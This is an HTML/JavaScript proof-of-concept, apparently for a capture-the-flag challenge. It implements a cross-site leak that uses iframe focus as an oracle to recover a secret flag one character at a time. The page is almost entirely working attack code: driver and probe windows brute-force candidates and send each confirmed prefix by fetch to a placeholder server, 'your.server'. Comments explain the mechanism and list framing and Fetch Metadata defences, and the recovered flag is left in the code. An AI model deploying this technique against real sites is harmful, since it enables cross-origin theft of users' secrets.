Contexto: tweet, tweet.

Código fuente: github.

<html>

<head>
  <meta charset="UTF-8">
</head>

<body>
  <script>
    /*
     * Proof-of-concept page for a cross-site leak (XS-Leak) that uses keyboard
     * focus as an oracle to recover a secret one character at a time.
     *
     * The same file runs in two roles, selected by the query string:
     *   - no query string: the "driver" window, which opens child windows and
     *     sends each one a candidate string (known prefix + one character);
     *   - any query string: a "probe" window, which frames the target URL with
     *     the candidate and reports back whether focus left document.body.
     *
     * NOTE(review): the target's behaviour is not visible in this file. The
     * oracle presumably relies on the target rendering a focusable element with
     * id "msg" only when the `flag` parameter matches, so that the #msg fragment
     * pulls focus into the iframe — confirm against the challenge source.
     *
     * NOTE(review, defensive): the probe depends on the target being frameable
     * and on its response differing by secret. Refusing framing (CSP
     * frame-ancestors / X-Frame-Options), rejecting cross-site iframe loads via
     * Fetch Metadata (Sec-Fetch-Dest / Sec-Fetch-Site), or making the response
     * independent of the guess would each remove the signal.
     */

    // Origin of the application being probed (loaded inside the iframe below).
    const localURL = "https://127.0.0.1:4000"
    // Placeholder for the server that receives each confirmed prefix.
    const remoteURL = "https://your.server"
    // Candidate characters, tried in this order.
    const alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"!¡¿?&%'(),-/:;<=>@[\\]_`{}~".split("");
    // Prefix confirmed so far; each candidate is this value plus one character.
    // NOTE(review): the committed value already ends in "}", so it looks like
    // the final state left over from a completed run rather than a starting
    // seed — confirm.
    let known = "CYBEX{¡wAlO_`L0v3S`_¿f0cUs?&Sam3SiT3!}";
    // Index of the next character of `alphabet` to try.
    let iterator = 0;

    // Role selection: a non-empty query string (the driver appends "?foo")
    // means this window is a probe.
    if (location.search.substr(1)) {

      // Probe role: wait for the driver to send a candidate string.
      // The listener does not check event.origin, so it accepts a candidate
      // from any window that can post to this one.
      window.addEventListener("message", (event) => {
        const frame = document.createElement('iframe');
        // The candidate is URL-encoded into the `flag` parameter; the #msg
        // fragment asks the framed document to scroll to / focus id "msg".
        frame.src = `${localURL}/walomsg?flag=${encodeURIComponent(event.data)}&msg=foo#msg`;

        frame.onload = function () {
          // Sample focus 500 ms after the frame's load event.
          setTimeout(() => {
            // activeElement is no longer document.body once something else in
            // this document (here, presumably the iframe) has taken focus.
            if (document.activeElement != document.body) {
              // Focus moved: echo the candidate back to the driver as a hit.
              event.source.postMessage(event.data, "*");
            } else {
              // Focus did not move: tell the driver to discard this probe.
              event.source.postMessage("justCloseMe", "*");
            }
          }, 500);
        }

        document.body.appendChild(frame);
      });

    } else {

      // Driver role: collect results from the probe windows.
      window.addEventListener("message", (event) => {
        if (event.data != "justCloseMe") {
          // A probe reported a hit: extend the known prefix and send it to
          // remoteURL as a URL-encoded path segment (response is ignored).
          known = event.data;
          fetch(`${remoteURL}/FLAG/${encodeURIComponent(known)}`)
        }
        // Close the probe window that sent the message, hit or miss.
        event.source.close();
      });

      // Every 50 ms, open one probe window for the next candidate character.
      setInterval(function () {
        let char = alphabet[iterator];
        console.log(`Testing ${known}(${char})`);

        // Same page with "?foo" appended, which selects the probe role.
        // NOTE(review): window.open can return null when the browser blocks
        // the popup; the next line would then throw.
        let win = window.open(`${location.href}?foo`, "_blank");
        win.addEventListener("load", function () {
          // Hand the candidate (prefix + char) to the probe once it has loaded.
          win.postMessage(`${known + char}`, "*");
        })

        // Advance through the alphabet, wrapping to the start after the last
        // character; `known` may have changed in the meantime via the listener.
        if (iterator == alphabet.length - 1) {
          iterator = 0;
        } else {
          ++iterator;
        }
      }, 50);

    }

  </script>
</body>

</html>